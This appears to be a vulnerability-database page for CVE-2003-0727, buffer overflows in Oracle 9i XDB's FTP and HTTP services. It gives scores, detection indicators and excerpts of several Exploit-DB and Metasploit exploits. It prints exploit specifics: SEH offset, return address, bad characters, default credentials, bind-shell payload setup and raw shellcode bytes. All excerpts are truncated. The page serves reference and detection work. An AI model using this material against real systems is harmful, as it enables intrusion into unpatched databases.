CVE-2003-0727
published 2003-10-20CVE-2003-0727: Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack…
PriorityP425low2.1CVSS 2.0
AVLACLAuNCNINAP
EXPLOIT
EPSS
68.55%
99.2th percentile
Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack user sessions.
Detection & IOCsextracted from sources · hover to see the quote
- →Detect oversized FTP UNLOCK command on port 2100 targeting Oracle XDB; exploit sends a buffer of ~1130 bytes to the UNLOCK command with SEH overwrite at offset 322 ↗
- →Detect HTTP Basic Authorization header with anomalously long base64-encoded credential sent to Oracle XDB HTTP service (port 8080); exploit embeds shellcode in the Authorization: Basic field ↗
- →Detect HTTP GET request with oversized Authorization: Basic header to Oracle XDB HTTP port; exploit payload includes \xeb\x64 short jump and NOP sled pattern before shellcode ↗
- →Check Oracle XDB FTP banner for version string '9.2.0.1.0' to identify vulnerable instances ↗
- →Oracle XDB default credentials used by exploits for authentication prior to overflow: dbsnmp:dbsnmp, scott:tiger, system:manager, sys:change_on_install ↗
- →FTP exploit authenticates with default credentials (DBSNMP/DBSNMP) before sending the UNLOCK overflow; monitor FTP login attempts with these credentials on port 2100 ↗
- →Exploit uses oraclient9.dll pop/pop/ret gadget at 0x60616d46 as SEH handler overwrite target; presence of this return address in network traffic or memory indicates exploitation attempt ↗
- ·The FTP exploit targets Oracle 9.2.0.1 Universal only; the Metasploit module has a single target and will not work against other patch levels without modification ↗
- ·The HTTP PASS exploit targets Windows x86 only (win32, winnt, win2000, winxp, win2003); the stack adjustment prepend (\x81\xc4\xff\xef\xff\xff\x44) is platform-specific ↗
- ·Payload bad characters for the FTP UNLOCK exploit are \x00\x20\x0a\x0d; shellcode must avoid these bytes ↗
- ·The HTTP PASS exploit requires a stack adjustment prepended to the shellcode before encoding ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow
exploitdb·2017-09-25
CVE-2003-0727 Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow
---
#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
#Date: 09/25/2017
#Exploit Author: Charles Dardaman
#Twitter: https://twitter.com/CharlesDardaman
#Website: http://www.dardaman.com
#Version:9.2.0.1
#Tested on: Windows 2000 SP4
#CVE: 2003-0727
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/
#!/usr/bin/python
import socket, sys, base64
#usage ./oracle9i_xbd_pass
rhost = sys.argv[1] #target ip
rport = int(sys.argv[2]) #target port
#Variables:
ret = "\x46\x6d\x61\x60" #0x60616d46 Little endian form
nop = "\x90"
pre = "\x81\xc4\xff\xef\xff\xff\x44" #This has to be prepended into the shellcode.
#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "\x00" -e x86/shikata_ga_
Exploit-DB
Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2003-0727 Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_ftp_unlock.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
'Description' => %q{
By passing an overly long token to the UNLOCK command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
c
Exploit-DB
Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2003-0727 Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)
Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Description' => %q{
This module exploits a stack buffer overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Black
Exploit-DB
Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2003-0727 Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)
Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_ftp_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Oracle 9i XDB FTP PASS Overflow (win32)',
'Description' => %q{
By passing an overly long string to the PASS command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conferenc
Exploit-DB
Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow (Metasploit)
exploitdb·2005-12-08
CVE-2003-0727 Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow (Metasploit)
Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::oracle9i_xdb_http;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 0,
'UserOpts' =>
Exploit-DB
Oracle XDB FTP Service - UNLOCK Buffer Overflow
exploitdb·2003-08-13
CVE-2003-0727 Oracle XDB FTP Service - UNLOCK Buffer Overflow
Oracle XDB FTP Service - UNLOCK Buffer Overflow
---
/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* */
/* Original Advisory : */
/* http://www.blackhat.com/presentations/bh-usa-03/bh- */
/* us-03-litchfield-paper.pdf */
#include
#include
#include
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";
unsigned char exploit[508]=
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
Metasploit
Oracle 9i XDB FTP UNLOCK Overflow (win32)
metasploit
Oracle 9i XDB FTP UNLOCK Overflow (win32)
Oracle 9i XDB FTP UNLOCK Overflow (win32)
By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsmp, scott:tiger, system:manager, and sys:change_on_install.
Metasploit
Oracle 9i XDB FTP PASS Overflow (win32)
metasploit
Oracle 9i XDB FTP PASS Overflow (win32)
Oracle 9i XDB FTP PASS Overflow (win32)
By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.
Metasploit
Oracle 9i XDB HTTP PASS Overflow (win32)
metasploit
Oracle 9i XDB HTTP PASS Overflow (win32)
Oracle 9i XDB HTTP PASS Overflow (win32)
This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.
No writeups or analysis indexed.
2003-10-20
Published